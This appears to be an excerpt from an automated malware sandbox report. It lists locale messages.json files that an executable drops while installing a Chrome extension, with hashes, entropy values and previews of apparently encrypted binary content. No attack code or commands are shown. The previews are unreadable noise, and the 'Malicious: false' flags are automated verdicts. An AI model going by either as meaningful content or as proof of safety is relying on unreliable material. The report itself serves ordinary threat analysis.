Preview:	{"cra.~..T..'C...~...9..2. .Y..{...._..`N.y/...:.3:....LGVm..U......B..I.g...&.+.B...>64..{c.....[.&..k....V.'.`.%.1.d...V....P7#.8.1..&....,]..Y....e.e.....h..n.=~&......i9m.Q.\1}...nf.c.;. .5...VEy.Cy..&@s.gI$j......7eh.Q..0...~...<.#...4`..p^.}/.z... .3..J.....s`.o8.Ou.<..D.;..!..\|.a.....n.Le.~.>..D=.-.%.....2.R...I....!\......<"..o..S..?Cz..mA.3..e..9$....;$...,.?....=...\|L...o../..DQ..9..<..D.w..a..s..:...V}....%.H.%.7.Y.H.....}K......l\--&..+.....@k....L.`..kO...O...L=...-.p..w....2.x..././.jv.. \|..A....x....l.I.....5.G'{.(.o..K%.JsA\...8...a;.w...rt.ay.2..~.....$.b>.._Eb.f{#.b...A.u.......o.p.....6.(...W}Oo.c....B.u-D0.../.:.ILz..-=5^..U..=..O.Qb.....-..O...]@v......b5...i..x...R...).fTu..^.Qf..r..N..6.0....[..N.y1..`..........}I.M....Dj.;{.E...........(...X..a.g...G...-...m..N.I4K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\nb\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	835
Entropy (8bit):	7.748581092660728
Encrypted:	false
SSDEEP:	12:YG5A+COp/+p2s5V1OAd61YNDZiRgA14SaOKnd57zcrGjKqlRdtcii9a:YqQOpns31OAY6NVAlKnd1zcs7bD
MD5:	9F26DDA40F2F12879ADB3B02879C93CE
SHA1:	795D4388A9CC9EDB9D268D895891C6D9865577D5
SHA-256:	1170E70E502C42B8B891B9795662A4A1431A24C78F32473B76D0E53628D2F75F
SHA-512:	2FE2ED6A75147CC78F557233D50AC0F85EB8CB15921CAC4B723E8F3F696FC5596BDA6B9318D83996BBF581ECADFF78F2F982CFB1E37C14767D63C188F0A1B76E
Malicious:	false
Reputation:	unknown
Preview:	{"cra..=.qu...7.W.L..Q..s..6e....(&.".?.....0n...bhr.U....;...!......`.S.8.elBw..Y..?...x..\|....#kQe.E...{...\.x.8_.....1b...+..[.x.mGX.#;+..3@I..q..&.Ed...."."(e.+r.@....i....a?. ..i..V.....OU.2.I...]....:@Z..4I..+.l]...)..<r..r-.N...B.#..N.<....\|....-..+.p...."..4.?...y..d6s.x..7......}..9XPTGR./^..\.).;]D..!......<.....WL}. PB.H......H'.........iRpd..&S..ggw..z....f...........W/S.V.......n...z..k..m .J#.?._.7../..FP.L'.pW.d...G2.S...D...4..ig/.......=....[(..+...z.s...].=@..1.....".S..}-......fx.u...C....{;.A...- ....VO{......Lz..g.vE.......5......H..O........!l..."._+..~.e..v...`c.JA............x...Zr0(?....I.3..:P..f.b4.69.l.2......}.P+.....@...F..O..QmI..0>.F..g....9u.4.<v.s#......1\..iw......8..\|.o.:.u.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	7.714992103691787
Encrypted:	false
SSDEEP:	24:YYks2uzNeHdq0CPeUyLaos1rFXegm84CW7+wFJ4bD:YBKz4HE0uebaD1ZX1gDvKD
MD5:	6FAF2C2CCB219C3FF038D8293778D0D2
SHA1:	FFE0FA8A996E7A3669A646F956581F2474BC173F
SHA-256:	D817BC406F5B167B7C7A2FCDF4C5AF3DE31B37F34E9E2197C345147EACDF7565
SHA-512:	35225B15F9C57B2072CF18B30E8403BE99DF9901B7CB47E15B5242045DBC6CC5EB0367CE40A65D025E0C53D2102A58E0A1F1BA65828708CB12C4B370EC72A1AD
Malicious:	false
Reputation:	unknown
Preview:	{"cra..3..+i..&#(<..F.'.rv.b.U.X...u.....g.J9..q.Jx.Y.......hy.... .Ar...........C!3+bW[x.1......u.<...85....D..=l_K.A.....9..'u(.iE.3.2..8t..]h.y.m..i..s.[C.....3.#B.Ek..z..kS.7L.5.S...........!....I...Zn5.S.....=.......e.c....#.r..b.6.....I..&....8.ba..keJb.'-_..._}E..j(3..-w`A..\.....]..o!..V..3.....P&.......s....Ai..%..A.M.@}.:U.e...H.ej..Ci.+>#nw.T.%.?.i..-.5.G06.C........<Er....=.}.tz.28."\....n.J.w.3.n.p......] x........"...@_t[w^.h..-....z)._l.E.c........+...kQ+.'..D.p.2,...l%...)...37...J^L{C......N..{9...x.$....\|..[..z.o...........7r...[m.~....p.?.(..}^...I1%.ck..`."..4.Ssl...q.G.NFocLp..&.SX$u...l1..H.".G.uof.Y+....P......!x...........LE....Z......1!K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	7.763641923347464
Encrypted:	false
SSDEEP:	12:YGXiXCfgS4dSE1uv9J8dFD465DaDMHvY1L28a2iMG0Jq/cUmB2HpdFCbO6fHNRtX:YDnkOpd5uD2Kt5iMGNkUm6Pwbjf5bD
MD5:	9D60723C6162012BD24DD08F1C4DE7F6
SHA1:	33BD6212C6F4E46770453203C6C9B5A251AD5574
SHA-256:	87B39E4D23531FC21A336AB61E9C771E764BED92EA6FE89106078B8A0E3F7C7A
SHA-512:	26A6158ECABE2A08D67DCF6B40C35C4C124E9E7CDCE41712D3CE8E8D97A14C778276D74CBF923E588FBA951F0045FE3C344DB7EBE1DD22EB89385E770DF61699
Malicious:	false
Reputation:	unknown
Preview:	{"craV...&O.1..\.JG._1.6....G3).Y.._....9..c.Ob....../.mE)r.j.L!<.eR.\..%6.5.=...<..}.h..G~$..m,...q.....Q."....$85d/.z16...z!.\..CN....'......s,r...T..B...p.qi.9AO....H`.....\...Ab.G.lc....-..K..T_~..`...Nh...%..wL.,e.%.[...g2$...&.....!...Fsw0.@.K.V.P.....M.1.A].>.8.........Q....$..f..JB'.Y.h...{.B.Z.l.'..kJd.%7.x.#.].. K!o.k(D.r..;.@q.Tw.;..q.{.M.Z..Z.......[5 ..!.~04....>.r.j.\....4..@g.&.y..c.2.........k..G_..N.\/...S....hs.M.....gt...K6.].V(....}.~5..:[..L....0.1.i.\U..9Z!U.c.8.n..X.4z.\|.?.b..?E..y&P\.R=Ewj:.}....?...U........1+...Ev..k.N..D>.>..h....v.'..5.,tA..w.'K..FEP.#j....1..s..fV..P.T...J...^)Sv.U....C.7......O9..J.d.oN..nC+....HQH.zx..s.r.....O..ro..yC..o.....t....7}.(......g........z./y......8..y.{o4.U........vQ....d..ZV=.%T....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	847
Entropy (8bit):	7.711453332411264
Encrypted:	false
SSDEEP:	24:YB09yLSvZWvL7m34tZ+o9WbTyrrCuzrQsbD:YBUI3xtZ+oobgCurxD
MD5:	DA4E09046F5910F0EF72F0F06217E95C
SHA1:	0BA35531357EF7D8754D59579D4B598128B8F7CC
SHA-256:	301949DF56D0C815148F11FA4D8DF5CA5CD0A244BCAA8DB17BF0B728CFEB80B2
SHA-512:	EFC7826EB77056A9E9C962FF787AA49E82EC99C6127BF9BCC1B32F69503E2ADB77E4EA80C8F413A584E10DB3D7BAF333DCBD39FEF60AF764D566121EFAB3E708
Malicious:	false
Reputation:	unknown
Preview:	{"cra....Y.....S..">.naW....U.c..>Es..$.g..O..y......].[U...5...e...:.B..9...du...5\P.).>..P.D.Z.......&>.1...........q..zJ.$..}...\......@.k:l`....)...}V...~@K.uSd!..j.[s..p.. .3R...yo.%.......N...t.r..................i..Dw.,.=.4z.fj.h..:$.ie.>.....Nu....%\\.U.....p.u8....U@I(.....G.&V..uA.."..RWB..X...t..L."..-....#..........#k.....C2..&x..@.....'..poC.}..5=..}..km.."..8j...:.......Z.i.Cm.u]4I..BR..#.C.(.U....7.Wx.l.......x..`@6...$............U.`s......K'?K.e.\|..S.....x...?.....8.h...!.j,.F.v.%..F.9V.....L.....&....vK..p..:..).Qy.,Q]g......D....4.9.p.q........FX.......Lh9"0.3....O ....t..h%/.$.XA..64C..N.@..3.l..Ql.+..G..6.KTW.....yv.....52a..9.=\/.g...oCq]..X.D.R.....O....F....V.(O..5.o.v'...y.:.;Q...e.......g..(kt.JM...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	837
Entropy (8bit):	7.693494306505617
Encrypted:	false
SSDEEP:	24:Yd9fIy3gAwoOqXOi5LCnxXyFR92L5GpIy+bD:Yz33wLAOlnIFR94M2D
MD5:	2CD672368B215C0CF262E87C7DB8686C
SHA1:	7F8B9B227585747FB1B8C51F0A2851BA5A774ED7
SHA-256:	5D6D4313FF0526FE5AE7832CEC9F225DB78BC38B5D7DBB023B606320CB9634CC
SHA-512:	1379F47612DD0CDC001996775A4AFD6433766351CDC0D43B61697A0BB16DDB2E5CE961ABF6B715BBE2C8F13D274A71EB1124B297B03456CD01F9E525B8CB962B
Malicious:	false
Reputation:	unknown
Preview:	{"craF.b......3.,:..I.Gi..............K.:{....u3{e..TW.0.\....1.s.$6.."%..H..b..!..;?...U.............j/.<..J..F.v.......@.....q"Y...~.!...%.. q..d..F..B..gEpG..5.[D...b^..../...fe=.8...).[..<..d)]iu...0.D.......G.k..z.....c...R:e.J{.\....iW..C+..=Z.w...T..P.!.T;5.y3.Fp.....p5..o........\..@<..[.PB......X9;.XDX..V...\tF.B.M..\...D..S..'....R..")..FS-....e.V.v.h.c.....YX...cU...`"P.5.,v..~J.q..u.....QNr..y\.....I...w..#_.A.....m...1...GW...=G.s.*.i.\|.&..?bf.....Ei.....m...yB.f.Y...\|....j.i.-.C.....7......i.z...f...G.p..:H....@~..;..BM.@..x..@.<.#}gV)...O.. ..N..A...f1....b.j...&.a...[.U=S......Rt...q.ap.-&O..qI.a.f.....G.h+..7.v..QG.F.....i...D..y.9"qu....]...4..U.L[E.......%H.:.z....\1......r...! .I)B.....1.......I....5K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	888
Entropy (8bit):	7.742209602036389
Encrypted:	false
SSDEEP:	24:Yg9VY6C0FUpj4InioN6BC1NuGUJRZmHkryfsa3CUiY5JTbD:Yg9Vb+sIzM5JHmEryf7Vn5pD
MD5:	56F1C493E0B0809C4B82E9A1E56A8B5E
SHA1:	76626546CE01A0F6E2265154CFA3B251F77B096B
SHA-256:	9FBF05186C15BFB5C026397F68C4FE0527D8F8A6C13C650927C4F1875E998607
SHA-512:	B98D3950BD40C488C36084B7B0580233A19F43316AE19B399349E18E8CA50135A74A4E0A3D1E09837DFA103C29AFC897B743971F7833047A90340FCCE641A8EF
Malicious:	false
Reputation:	unknown
Preview:	{"cra......"y..:V.Yn...:..j..p?.5v.G3w...........I..+.B......2.......Z.<9.@../#WkpcC..T..<..n..J..n.t).F....?9.... aX....]4..E...............'...dT...N..#...z<.L.}.y.\|Q.;.._.!....$%..>.p".B......^...a..w.....)..Zq.....s..v. ..o....]NO#....k.^....>.3!7.`..=....n........l$........qT..rA.....,.#.zOGi...J1.Uj~...w...8y..Y......}b.U.:.......4.....G`..r...P.K.n.q.3. ....6.......W$L.D.'..cl...PaR.....,.y$.a..E........V.oo[.xrj.&hl.F...+.x.*...]mX..d...YB\...G>-.YK....d..8<l...[..MS.HV-.[e..._.k9......;X.;...x.hD....#FE6..]....W...G...Et.kaK.{....... %ka.!$...N..Et......9...FL....;M..)q.].Li.>..z.o`Cm.......icM.c.L..%.VN.E+}...d.C..Z..HU5li.."`.aH..j.a....\..........c..5....&L....r..#x../..1s...Cv.h.U.R...P...S]bXy........%y...H........s...p../..=uLB.1.k?.........K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1499
Entropy (8bit):	7.860238638531556
Encrypted:	false
SSDEEP:	24:YDRTwHGAYZofsPtM5mNe7rVGFIa8yEwIP2yYpa7ZXpMWyruxcslAwINBAEXbyERD:YxwHGAuofsPtEoWxGFVPazJZFDasl54v
MD5:	3355D945E1EB5ABDD0BF2460C805B3DC
SHA1:	B2531A52EE0E2DE76AAE54CFB10C28BB5979E278
SHA-256:	2A6A430F9D1BB79810F83D16E4F371ED4607514CB44BB3704587513AE5580EC9
SHA-512:	A4241777D12B8D2076C2982397DA849E8938F3434CACAF839ECA3EA394BEF790FCA48565264CA1F366BF5264ED4AF519878F48F7A7ACA5B3715CBFD8C68CA9DF
Malicious:	false
Reputation:	unknown
Preview:	{"cra^...rt...~me...i\F.....hw,.....W..Q..>...}....R...X..j...8....T.....N......D.X..~.-.;......\|).g_.F...,b..m.Ig.i..{.........+....>..{.Y;-.%.._..?..p[[...e .\|.[PT.x...\|>.............f(..%..2.h..M(V...w..A.....o..k.O....;\...1.<.....w..3....`.ROd..\|..x.#"!.8p....xS.k..,8.v..1.$.....U."........nGB._c...XGHaT.8\.7[..E...Z?9.A...?HSG.tfL..]...t..5.5...@V.n......S_.u}}..8.u.?H.....X...3.YbF...)..H...D."[$....<.."...f..Lb....w.=..........3....3.S..H........X..R0.<.....%............G([....8.K..@...@...)w...~7.Pe.....g...KB..l`.+D..5..9.Q.....X.M-.?a.5.y....R..59A.G-...f.>q.Pc....aM!.!.I./.>. /.;.......,...(..7.....0.`\}.T.'.Nx...^....TK..S.l..(}...jQ...:Vf.r..%"..W...^]-.4.+......E......O' ....4....cx:.K.......j.'[aQ.d.:"_..z.Kb.@l.L...*i,..2ymx.......;.....\.f.ic....n.id.m..8X....S.......<...-.>x....t....L9.xb..XX....`..+........I.s......3.1.a.e.....M,.v...t...v9.:.v?...K....0P.9.s.K-...,..9.T.9m\.Y..3...f>...".VOz}...q.....Y"..m.

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	882
Entropy (8bit):	7.808887353151934
Encrypted:	false
SSDEEP:	24:YwCYjxWq3xSrSOf7clXCy4GnkEqvftWpqRi8yP1UybD:YwC2WMxXOTc5SGnkEqntwqRi8+XD
MD5:	2DF495890789EA9BEDF324FCF80E8E28
SHA1:	B9770125FFC8106F4798BAD3109D9A832EF5A499
SHA-256:	9A398C13D7A8BF6EF88B5122821A2D793A2B83C0C9D85D2BC1AB5D6AAEACF77B
SHA-512:	F271A3D03E55975A389E052D8369B48359A731E81DD0C56F7901E941A4249B6122C69CDEAF8061FC9D366FFFE11C31B26294F478FD94DCA8003AC44EDA522E47
Malicious:	false
Reputation:	unknown
Preview:	{"cra...?.1u.....!"W..$MJ.......u..J,.!.....^;'h...y....mE..&.."_...J.C.....n3.O....L.^r....Pb.....n..H...Fz..=........mf.H.......g].p..K.....F...\D,...)B.[.!=M....?..dR..u..q.".....bZsd....j.[!...SK..n.<.(9.....D<sR...Re77.Q."r.GC0.}....T..`>.X..,.g........0......I.L`..h....B.+.<..L....\3.;......U}T.=...;.L...kB...0D\I....../I+.J.'.y\...\|.]...8t..L......./...o.6.....$6.P..A0.A....\|.t.n..m...%..<..U.=G.....?...'O.c..l.at..Yb....,.VD...[..o.._....;...Z..'.,.l.P.....`..(....)W......&...P....pw..[8..!.r.......6....f).a$2.f.....Q.V....f....6......7}.;.}..-....6.@..-.&V.`~{..5m.Qf..nD%.9..:.$....)^..D`.....;+..BQ.]..uq.(....:.)....s:r*.......x...95v.1%..MY...U...+... n..\.,g..`....(.X.....W5.i\[..=.......J.g....e_..w1E.]..ls..C..jpb.'.".S......-7.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	828
Entropy (8bit):	7.782138241803109
Encrypted:	false
SSDEEP:	12:YGtjp+TaQIXCiArvoTJVUD0m4dtXNkCJZBs5MpEmJ6N3LdfGI8McBhgVIrbXMtcq:YqFmaQ/oNC+tXmCH25Mig6r/vOibD
MD5:	D2499F01AE0020C0DD9D436F89949570
SHA1:	372BF46FEBB693B553654F27BD9F00773604DFDB
SHA-256:	ECA998E97CBD626373E953C8B54FE71CF1472C24EA2A6F90CC51E5BAB320CFB8
SHA-512:	D53CECC60CE8ABE41475E4B5890F98F9C2E7B00B5166A4C10315231A43C9C355E402BC273A4879AFEB6862B5DEBE49ED6BB39E09FF110728E55FC2AEF5FB6C70
Malicious:	false
Reputation:	unknown
Preview:	{"cra.m....}...b...J....M..../.)....YZ....J..S....<........d..B....g.XG~..A..e. ;C...K_.({...[...q....QE.HB!.b.X.C....+..k.@.........`.....%.%..[.[...g..?...7.E%..:....P....R.....?..u.2..D....AJ..@%.%.......l...v#.....2.5..MA......`[.kh2.L.o...s.h-...#..e.BP40.1..\|.z1..,...V.D...z.:{......}.L.%..X.....h^..f"...$r.c..P.5..4).U.........DQ.#.B..Z.]..]`V.. ...r>........'D/.H.8.....W.O.\;`L...2.!n....Y^.....t....\.w..X0..j.-...g.G..<..x8...AP.[W.O...{.K.......%.#..;.#/..`I.<..?.......G.\|....8i..z..3....Pt[+.....xO....e..w...1.]..e....dX.=x..`..).......o.P .b.^.>...U`c.....ZRH....7S.C...VQ .zP....3.............w,a..~&.gae.\|fZ.6....~....t.3.MU.\.......Z.^.k%.S...3....F..j..4..Ke.v...*....z..............1.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1486
Entropy (8bit):	7.870495876360421
Encrypted:	false
SSDEEP:	24:YtV2tY/C5Y7k8afqrY0hSjDmjOjSjdBKs24D8mgvL5DuYhnayNasJXMDEg8lyrbD:Yn2tkCEk8hr+jKySjnPgXvVuY1ayvE8m
MD5:	665126E45B4A141CFADFEBD193C02E30
SHA1:	BC2E1E3CD244A7D62309D146D7B6C6DCCCF969DC
SHA-256:	86D0719C220B583D5B5A580034037145B9024C8DA691F286B2729CE402767AC8
SHA-512:	AAFB6E26BC1C16A2B304357FADC28A333C6D414AB1142FB121B45FD801E76C45EC93B805B717625F41BB78D0857D18EE29B7D11F09E9AEC6FC8132B404368FC4
Malicious:	false
Reputation:	unknown
Preview:	{"cra..%.....3}d&2..dz.I.+7..Mp0....<r.bhS$.'R...)9t....b........6........2.4..wU>...l../......q$@.$...'..Z8H...#..=4.....:.zN.AN..^......[{..\|...3...y09P..^....q...l.'og)y,ct....a..U..\|...X..9E.!....SOw%..9..~..0.`aJ.-.s..d.3z..E....o.y.F....Z.K.c.^....-.m.......9,.)...?N..s...A..Ca...4.kX........H.......I...i...P=..j.H...........C....-...F;^$F.....)v.ee...#....7...i"...m+....d.w..Y`...w.(.-.h..gqX..m.........uR5..y.n.5....q.`9$bb...Y{]..=.....Q]t...V.S./..y#..>..!N1..H.E........T.z{.MK>C.Tp.G'J..".l.6.7.u.......FU...~........6...T..O./Tg.....z9.uw...{1...T.i.)....[c...t..n.u...l.v.x%...vg.Wn*9..^.~....I..q...Sq.K0..5.........\|..'..I..x.;......{8.k.....X.FY.......5.%1..?E.1Cz....e'..Xm..8jp....5>F.......kAS.s.Z.-.........n...F.....V~V...E........y..5P.A.P....._...Q..2..e........Y...0..\|,.^.G..l8]C.......4..`l....rMM..B?..bG.?..,G....-..<.......h.MN..7++._.y..).R\iw....~...[.#...Y..O..t'x...{A...eqp.iv....d\..U6A...aI7....x.X. ...Wh{){;.q.

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	857
Entropy (8bit):	7.733731633984566
Encrypted:	false
SSDEEP:	24:YPjMA9DXZL46N+55rlsf5vCadtxGHK6UqbD:YY0XK6NEhIMCtxcK6UID
MD5:	D87286CF4E51B6F73CFF6ECCF9BB7989
SHA1:	B50B7F99C81676F90B6D39ADBD30CA424383855C
SHA-256:	E1756175BEFD19F786D8D89DB084AAF2E8E20D8C629FF78C18D0650CCE51571A
SHA-512:	550B8BD3DF8669885D5BC5FE4CE9EDB352D6E1EB9369C4D138BD1F1BC0059FB90DCB748C5C3955DB9F8478AEE22136573CB3B08F1AC730E5FED9F385AA7174B2
Malicious:	false
Reputation:	unknown
Preview:	{"cra.n.t.....d.... .;` ...Q....O.].}<....~.Ei?WNQ.._hpO......)....7W...U....OF.H..w..K.....KO....mc...v.J.{)r........A<3....aX..qH.n...o...x&}......q;.C..c.)..A!B..K].-.....[f..E..(F.,@i...n&.;..K..+..8..?.....v.<.:)2.=."p..rm.,uj.4.hv.LZ.e....a3bm.d5Q~...'+.SS...c..Cs.Q........o..M..'.[.\S.f.%.Z'..#w...&.j.... ...!~G.......\|'..D........A.....y.W.`..TZR./.j.zb.........e.FC)`<<.v....%d.8...u.s.j,....2.....`%.d......n..Q,..+p.h......;.Jx".i.}@.....y<.}^U.< ^..>...?hU.....>_..G..H.BUr.....=...`........h4p8".....@`..c........%.?(.Pfg=NFHD........j...C..BD..p....j%%.......&'....P...K...........R...E%.h\|...3..`..w..}...o..e;....eT..%.........tA.RG..*)..;.9..G..Ivw...K)p:.y.'&../....\|....6..h8fj.t..HO.I...{.`.6.w..R...........oZK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1634
Entropy (8bit):	7.885373850502534
Encrypted:	false
SSDEEP:	48:YNIaBefqGE8ysHKh41TvepcTb9DhGnXymDpOD:KMfqT8KhIiOxDoCmU
MD5:	28BB4AFF93695D74817886459216C019
SHA1:	976AB0D55BA3F2B845512DD0DFD0B9AB139AA019
SHA-256:	9633E7F1E186C14A0F1E52804F4CCA45E766DBACEB1BE68E7EEBAD0C8817F25F
SHA-512:	018F77AF0E71CC644B568F634B5DC389EDF957D8AF70BEB14ECA2D51E373E36E843F18C869F76D948D585E008B0E0E30C4A24733D653CBAE67668DF1521EFFB0
Malicious:	false
Reputation:	unknown
Preview:	{"cra..p&x.(?.~.([..%F..W_.P..J.%(-l..'D....}...1e..>.....I.....t..I.$......+.F3X.~.(4W..Yv...2[...m...G.y_..:H..N..6N...Z..tp..<D.azgs`..R........w.z....g....9"....n6..-..Vy..;...y.a.4^..(...2"3%........C..r...7.O.o...(./.C....Q.7.."q.\|.^.!..{8.5..6g.M.Y.......F...i..i .^..P..-..(S.W....4..0.=.M.]. ......{.\...`%H....J..b....{.r'..t..#gs.$,....z.....5V...C...R1.;....n..M..U..sIp..OH.H.l...R.......S.......Y_...v...$.w.RFD.....A..<........A....g....'.......`..:"..J...kJpz;.7[. 1g..g..%w.=.l/;..7%...`..G.\|J..u.~.t..=.PVVP!...e.2....n..e..iM..>.:....=..b...f~sl3x.THx..d...Y.h...g...~...9.bb..G..d..).....b...X.bK.e.7...fZ..l.s....Rt._d.$z..\u.s...D7..q......+\...Y.~..X..h....2g.........f.....-.1.d....&......'N3...Y,..$.D^.....)..?....6..0C.......&....-N.p.....gu.& !g:.by=hk...%.e. .B.V.Z.....<...GW.*.#. ...!8.A..E.Yr%.;v..So.c.3K..x9G....(.e..$.Q..w...O......;.....O#..a.:bB..ImB...2.....s.b.Z....+.....-.6....q.l...2.....SZG.@'.@=...4

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	906
Entropy (8bit):	7.74136247641337
Encrypted:	false
SSDEEP:	24:Yrr9HqzLicP5dSAHgENLZ2JDuonbksBtiPzfPWHuLsTbD:YrBKdP5lV5ZsbksBtW4HD
MD5:	ECF203B41D3D87D8ADEBDCCE6AB235D2
SHA1:	EE73627FB8E637968112109B5D38A0A9A48909A1
SHA-256:	2DF2F10D18981F9E489A0A0673D79E026338712327D1832B90CFEAD43F914640
SHA-512:	63026DBD4392E1D1A60063E4DEAC665D82C2D93AF3060511BE272EA7D602453C1EE8DFC8E06E58936EFFC6C3EABE5E499D64D7359982BFD718896EDB98DC7179
Malicious:	false
Reputation:	unknown
Preview:	{"craNF@}..$.v..tb......v....ru...>...B."8A$82... 9?+k..W...T.K....+Q9.H..q....1B.@........C!Sy..C...FBmJ..O...<<.l.&...Z..b..%.......M.}..,..2..<jT..z9...Q..S^....d....$..RB.".r.BX..{.%..`f...X..$..i.%.Un.w...M.Wh.x..R....'.e..n.V.z.]0..@+..e.......An-X.L..}."....i.r.X/...U.../[[....I.'.86.$..w.0..7 ...+._..!2...z.{......b....q.>.NiF..@..{F.s.$.r.l....Q.........o..M4......@...\u...F.0O.7.:...m..;.1.1...<R......O(.m/[;.t......../........Zf.r*.....3w..5...3r$.Du..y. ..[..#..s.._ms..T....UC.qZV.+q<h.....;!...$...x.B.....4.2p....?.h@..{a...?.X..}.}.,F.XfV...T....l.s....:.5..M.?...@^...,..\|....U...)M./...~.....Py.{.j.........5I.M.3..2.R.....bG..h.k...\|.g.#........D.m:Y..&q..n.d.b.rZ00..r.EU.:.$..I.{+.L...-..e.7...N"T.._.lc..@.qm.).2.[.......R"..w.Z...$...u.w..#..8.{.\...RG.(..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1422
Entropy (8bit):	7.862464870331803
Encrypted:	false
SSDEEP:	24:YIhlJqysFxjslNzP7VDn1t5PcK0IexuBU7k9B5CB8+raFPDm+6KMl3MRbD:YMlJYFkNP5Dn1tlcv7xua7kw8ZLthMli
MD5:	DCC12D9B3650BB40EB458E9DFBB6A55B
SHA1:	05CBB5074C74975DCF24B93903389B514351BF4C
SHA-256:	B6E3CC0596E6D0EA78D47F9E68095DC79D77DE70D411434D4D80E9749CB46A47
SHA-512:	FBEFDEBB2E02EFE19D443A9F755BD6E135F501453B4EBF3C972ECBF8861DDE022928ED772F2C496D634565A73EEC1B747600080B8B3D7D64312649D797A8D133
Malicious:	false
Reputation:	unknown
Preview:	{"cra.U..$h./<...ZT<<N..5.V,!.7.t..M....ig.....R.x>...e;.ifO.V..a.....nq)..-..q...Uc...x c.'%.......i..I...-..czf,..N..y.0.!..,...`<./O}zCW....l...{!.n]"T5....h..F9@.-..0.......4..:Xh.C......ur.5..X.?u.Q...B.^.Y\..T.y..a...G\...h..........v...67.y'f....~`.....G.7q.P;...B..YOTw[....".....l.......x..0.r.9.K.[._.v.c.... .w......d.[k0>./.._W}.[3i$.n...L.+=D )...L.fB.b.H;.v.@.r..........w.<...u..#fl.S.W..7>.gAG.r.H..Zx..F<U./............4..>...T..nF..}.s...n...6.km....u.n..f....V.......`.s.,..(.,_.2.1.3`J5....k..H..?.5?..X..c...p.k..}...Mz... ..T.&..~J.W.2p..W...L@V..E.....R.x.B....7(.&{>[P.....n(@.M..2....0!.}.)...SR...C...F.1Z..C...././.s..AK#L.4...h..`.vK..>\|...T....^.n..F...'B..v.P.W...9.#.<+Q..^...pI.}VS0s..........b.e"H.......3.......<...@.v<..... .J./..3M.9.5U..n:..'..m.W...Sz<].....8>.>}w.X..)...*}.XUs,.PN.Ok......I.%tKXMj&.k.%......aq....$./........V-VzdV.7....T.$.s....z...2....`z`_...o..._.Pp:\|... 